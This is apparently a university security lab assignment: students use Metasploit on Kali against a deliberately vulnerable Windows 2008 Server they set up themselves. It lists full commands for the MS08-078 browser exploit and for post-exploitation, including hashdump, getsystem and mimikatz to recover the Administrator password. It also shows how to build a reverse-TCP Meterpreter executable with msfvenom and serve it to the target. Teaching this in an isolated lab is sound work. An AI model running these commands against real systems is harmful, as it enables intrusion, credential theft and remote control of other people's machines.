A11: Metasploit v. Windows (25 pts)

What You Need

  1. A Kali Linux machine, real or virtual
  2. The vulnerable Windows 2008 Server you prepared in the previous project

A11.1: Exploitation via MS08-078: (10 pts)

In Kali, execute these commands (one at a time) to start Metasploit, search for the MS08-078 module, and display information about it. 
service postgresql start
msfdb init
msfconsole
search ms08-078
info exploit/windows/browser/ms08_078_xml_corruption
As shown below, this exploit doesn't require any parameters--the default values are OK.

Execute these commands to run the exploit. 

use exploit/windows/browser/ms08_078_xml_corruption
exploit
As shown below, the exploit starts a malicious Web server and displays a Web address, labelled "Local IP".

On the Windows target, open Internet Explorer and go to that Web address.

A Meterpreter session opens, as shown below.

Post-Exploitation

In Kali, execute these commands to open the Meterpreter shell interactively, capture a screen shot, get the password hashes, escalate to SYSTEM privileges, load mimikatz, and steal the plaintext Administrator password from the Windows system. 
sessions -i 1
screenshot
hashdump
getuid
getsystem
load mimikatz
kerberos
The administrator password appears, as shown below.

In Kali, execute this command to get information about the system being exploited: 

sysinfo
Find the build number, which is covered by a green box in the image below.

That number is the flag. In Kali, execute these commands to exit metasploit. 

exit
exit

Task 3: Exploitation via Infectious Media (10 pts)

In Kali, execute these commands to create a malicious Windows executable file named "fun.exe" and serve it from a malicious Web server.

Adjust the IP address to match the IP address of your Kali machine (the C&C server). 

msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.16.1.188 -f exe > fun.exe
cp fun.exe /var/www/html
service apache2 start
In Kali, execute these commands to start a C&C listener. 
msfconsole
use multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 0.0.0.0
exploit
On your Windows machine, in Firefox, go to this URL, replacing the IP address with the IP address of your Kali machine:
http://172.16.1.188/fun.exe
Download fun.exe and run it.

On your Kali machine, a meterpeter session opens.

In Kali, execute this command to get information about the network connections on the Windows target: systen being exploited: 

netstat
Find the ESTABLISHED connection to your Kali machine and read its "Program name", which is covered by a green box in the image below.

That name is the flag.

Reading Assignment

Read this article:

Situational Awareness for Meterpreter Users

Answer the questions below:

11.3 What type of token allows you to take over the world? (2 pts)

11.4 What meterpreter command moves your session to a different process? (3 pts)

Posted 4-5-19
Point value for 11.2 corrected 4-8-19
Revised for WCIL 5-20-19 x